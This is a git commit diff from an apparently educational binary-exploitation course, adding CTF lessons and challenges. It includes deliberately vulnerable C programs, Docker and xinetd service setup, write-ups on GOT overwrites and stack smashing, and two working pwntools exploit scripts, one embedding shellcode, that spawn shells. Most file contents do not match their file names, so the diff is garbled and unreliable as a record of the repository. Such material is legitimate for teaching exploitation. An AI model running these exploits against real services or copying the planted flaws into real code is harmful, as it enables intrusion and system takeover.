Added the advanced exercises, sections 9 and 10

Author: nnamon

cleanup.sh

@@ -1,4 +1,6 @@
 #!/bin/bash
 
-find . -name 'peda*.txt' | xargs -n 1 rm
-find . -name '.gdb_history' | xargs -n 1 rm
+find . -name 'peda*.txt' | xargs -t -n 1 rm
+find . -name '.gdb_history' | xargs -t -n 1 rm
+find . -name 'core' | xargs -t -n 1 rm
+

lessons/10_bypass_got/Makefile

@@ -0,0 +1,11 @@
+all: 1_records 2_event1
+
+1_records:
+	gcc -m32 -fno-stack-protector -znoexecstack -o ./build/1_records ./src/1_records.c
+
+
+2_event1:
+	gcc -m32 -znoexecstack -o ./build/2_event1 ./src/2_event1.c
+	cp ./build/2_event1 ./services/event1/event1
+
+

lessons/10_bypass_got/build/1_records

@@ -0,0 +1,17 @@
+FROM ubuntu:latest
+ENV user=event1
+RUN dpkg --add-architecture i386
+RUN sed -i -e 's/archive\.ubuntu\.com/mirror\.0x\.sg/g' /etc/apt/sources.list
+RUN apt-get update
+RUN apt-get install -y xinetd libc6:i386 libncurses5:i386 libstdc++6:i386
+RUN useradd -m $user
+RUN echo "$user     hard    nproc       20" >> /etc/security/limits.conf
+COPY ./event1 /home/$user/event1
+COPY ./event1service /etc/xinetd.d/event1service
+COPY ./flag /home/$user/flag
+RUN chown -R root:$user /home/$user
+RUN chmod -R 750 /home/$user
+RUN chown root:$user /home/$user/flag
+RUN chmod 440 /home/$user/flag
+EXPOSE 31337
+CMD ["/usr/sbin/xinetd", "-d"]

lessons/10_bypass_got/build/2_event1

@@ -0,0 +1,3 @@
+#!/bin/sh
+
+docker build -t event1 .

lessons/10_bypass_got/services/event1/Dockerfile

@@ -0,0 +1,3 @@
+#!/bin/sh
+
+docker run -dt -p 1902:31337 event1

lessons/10_bypass_got/services/event1/dockerbuild.sh

@@ -0,0 +1,12 @@
+service event1service
+{
+    disable = no
+    socket_type = stream
+    protocol    = tcp
+    wait        = no
+    user        = event1
+    bind        = 0.0.0.0
+    server      = /home/event1/event1
+    type        = UNLISTED
+    port        = 31337
+}

lessons/10_bypass_got/services/event1/dockerrun.sh

@@ -0,0 +1 @@
+flag{g0t_m1lk?}

lessons/10_bypass_got/services/event1/event1

@@ -0,0 +1,31 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdio.h>
+#include <unistd.h>
+
+struct record {
+    char name[24];
+    char * album;
+};
+
+int main() {
+
+    // Create the struct record
+    struct record now_playing;
+    strcpy(now_playing.name, "Simple Minds");
+    now_playing.album = (char *) malloc(sizeof(char) * 24);
+    strcpy(now_playing.album, "Breakfast");
+    printf("Now Playing: %s (%s)\n", now_playing.name, now_playing.album);
+
+    // Read some user data
+    read(0, now_playing.name, 28);
+    printf("Now Playing: %s (%s)\n", now_playing.name, now_playing.album);
+
+    // Overwrite the album
+    read(0, now_playing.album, 4);
+    printf("Now Playing: %s (%s)\n", now_playing.name, now_playing.album);
+
+    // Print the name again
+    puts(now_playing.name);
+}

lessons/10_bypass_got/services/event1/event1service

@@ -0,0 +1,87 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+
+int active = 1;
+char name[200];
+char * secret = "The Secret is No Longer Here. Get Shell!";
+
+void print_warning() {
+    puts("=======================================================================================");
+    puts("This Kaizen-86 Artificial Intelligence would like to remind you that this is not a toy.");
+    puts("Please treat this terminal with the utmost care.");
+    puts("Crashing this program will result in ship malfunction.");
+    puts("You have been warned.");
+    puts("=======================================================================================\n");
+}
+
+void print_prompt() {
+    printf("Options for ");
+    puts(name);
+    puts("1. Peek Memory Address");
+    puts("2. Change Name");
+    puts("3. Overwite Memory Address");
+    puts("9. Exit Terminal");
+}
+
+void peek_prompt() {
+    int * address;
+    printf("Address: ");
+    scanf("%p", &address);
+    printf("Contents: 0x%x\n", *address);
+}
+
+void change_name() {
+    char buffer[100];
+    printf("Name: ");
+    read(0, buffer, sizeof(name));
+    buffer[strcspn(buffer, "\n")] = 0;
+    strncpy(name, buffer, sizeof(name));
+}
+
+void poke_prompt() {
+    int * address;
+    int data;
+    printf("Address: ");
+    scanf("%p", &address);
+    printf("Data: ");
+    scanf("%x", &data);
+    *address = data;
+}
+
+void print_secret() {
+    if (getpid() == 0) {
+        puts("secret");
+    }
+}
+
+int main() {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+
+    int option;
+    print_warning();
+    change_name();
+    while (active) {
+        print_prompt();
+        printf("Option: ");
+        scanf("%d", &option);
+        if (option == 9) {
+            active = 0;
+            puts("Goodbye.");
+        }
+        else if (option == 1) {
+            peek_prompt();
+        }
+        else if (option == 2) {
+            change_name();
+        }
+        else if (option == 3) {
+            poke_prompt();
+        }
+        else if (option == 4) {
+            print_secret();
+        }
+    }
+}

lessons/10_bypass_got/services/event1/flag

@@ -0,0 +1,38 @@
+Drag Race
+---------
+
+Lack of negative number validation and writing data outside of the designated
+buffer to overwrite a char array pointer to get a write what anywhere primitive.
+
+# Question Text
+
+```
+With a bestselling book under her belt and over fifty million copies sold, Anna
+Sewell has decided to go into the stock market. Please help her figure out her
+stock market ticker.
+
+nc play.spgame.site 1350
+```
+
+*Creator -  amon (@nn_amon)*
+
+# Setup Guide
+
+0. Install docker on the hosting system
+1. Replace the flag in distribute/flag
+2. Build the docker image with: `sh dockerbuild.sh`
+3. Replace the port 1350 with your desired port in dockerrun.sh
+4. Start the docker image: `sh dockerrun.sh`
+5. Test the connectivity with netcat.
+
+# Exploit Details
+
+Setting the offset to -8 allows us to write the the symbol member of the
+ticker\_tape struct. Now, we can write the address of the src\_file global
+variable to the member byte by byte. After we have overwritten the char array
+pointer, we can choose to change the symbol to overwrite the src\_file variable
+with "/bin/sh". Finally, we trigger the shell by executing the view source
+command.
+
+Working exploit in service/exploit.py.
+

lessons/10_bypass_got/src/1_records.c

@@ -0,0 +1,34 @@
+from pwn import *
+
+#context.log_level = 'debug'
+
+def main():
+    #p = process("./blackbeauty")
+    p = remote("localhost", 1350)
+
+    # Random tape length
+    p.sendline("10")
+
+    # Write the address of the src file to the symbol member struct
+    src_file_address = p64(0x6020a0)
+    p.sendline("3")
+    p.sendline("-8")
+    for i in src_file_address:
+        p.sendline("2")
+        p.sendline(str(ord(i)))
+
+    # Write new shell command
+    p.sendline("4")
+    p.send("/bin/sh".ljust(16, "\x00"))
+
+    # Spawn the shell
+    p.sendline("8")
+
+    p.recvrepeat(0.2)
+
+    log.success("Enjoy your shell!")
+    p.interactive()
+
+if __name__ == "__main__":
+    main()
+

lessons/10_bypass_got/src/2_event1.c

@@ -0,0 +1,37 @@
+Drag Race
+---------
+
+Simple reverse the password, and buffer overflow RIP overwrite to shellcode
+stored on the executable heap.
+
+# Question Text
+
+```
+This bad binary is all T. All Shade.
+
+nc play.spgame.site 1345
+```
+
+*Creator -  amon (@nn_amon)*
+
+# Setup Guide
+
+0. Install docker on the hosting system
+1. Replace the flag in distribute/flag
+2. Build the docker image with: `sh dockerbuild.sh`
+3. Replace the port 1345 with your desired port in dockerrun.sh
+4. Start the docker image: `sh dockerrun.sh`
+5. Test the connectivity with netcat.
+
+# Exploit Details
+
+The binary strcpys up to 512 bytes from a location in the heap onto a stack that
+has 128 bytes allocated for a character buffer in the function 'violet'.
+However, you need to pass a check on the first 8 bytes of the input. The binary
+provides the address of the heap buffer.
+
+If you reverse the binary, you can retrieve the values that pass the check on
+the first 8 bytes of the input. Now, you can overwrite RIP by smashing the stack
+and place your shellcode at index 8 of the input then jump to that location.
+
+Working exploit is in service/exploit.py

lessons/15_advanced_exercises/challenges/black_beauty/README.md

@@ -0,0 +1,26 @@
+from pwn import *
+
+shellcode = ("\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb" +
+             "\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")
+
+#context.log_level = "debug"
+
+def main():
+    #p = process("./dragrace")
+    p = remote("localhost", 1345)
+    leak_line = p.recvline().strip()
+    buffer_address = int(leak_line[22:], 16)
+    log.info("Buffer Address: 0x%x" % buffer_address)
+
+    payload = "Ru'Pauls" + shellcode
+    payload = payload.ljust(136, "\x90")
+    payload += p64(buffer_address + 8)
+
+    p.sendline(payload)
+
+    p.recvrepeat(0.2)
+    log.success("Enjoy your shell")
+    p.interactive()
+
+if __name__ == "__main__":
+    main()

lessons/15_advanced_exercises/challenges/black_beauty/distrib/blackbeauty_6b350b986168bfcf6a85fecc377552dd

@@ -0,0 +1,54 @@
+Diapers Simulator
+-----------------
+
+All server side files are in 'service'.
+All files to be distributed to the players are in 'distribute'. Please add the
+server address and port in distribute/description.
+
+# Exploit Details
+
+There is a vulnerability in the line:
+
+`memcpy(diaper_profile.brand, "Bunny Rabbit", 12);`
+
+The struct member length for the brand is 12 so this means that there is no null
+terminator for that member. It looks like it is correct because the member for
+wetness intentionally contains null bytes.
+
+There is also an integer underflow on the wetness. You can decrement wetness
+until it underflows and hits -1. When you do that, all the null bytes in the
+wetness member disappears.
+
+Changing the brand uses strlen to check how much to fread so now, there is a
+possibility of overflowing the brand member into the brand message member.
+
+The brand message member is used in a format string vulnerability here:
+
+`printf(diaper_obj->brand_message);`
+
+Use the format string vulnerability to leak address of printf and calculate libc
+base. Then replace puts in GOT with system. On the next call of puts:
+
+`puts("Shhhhh goodnight sleepy baby... go to b;ed");`
+
+This will spawn an `ed` calculator instance which lets you get shell by doing
+the following statement:
+
+`!sh`
+
+Working exploit is in service/exploit.py
+
+# Deployment Instructions
+
+0. Install docker on the hosting system
+1. Replace the flag in distribute/flag
+2. Build the docker image with: `sh dockerbuild.sh`
+3. Replace the port 1343 with your desired port in dockerrun.sh
+4. Start the docker image: `sh dockerrun.sh`
+5. Test the connectivity with netcat.
+
+libc should have the following hash d58eb4bfe204b6332b9ab3394ea943ef otherwise
+replace the libc in distribute.
+
+Cheers,
+- amon.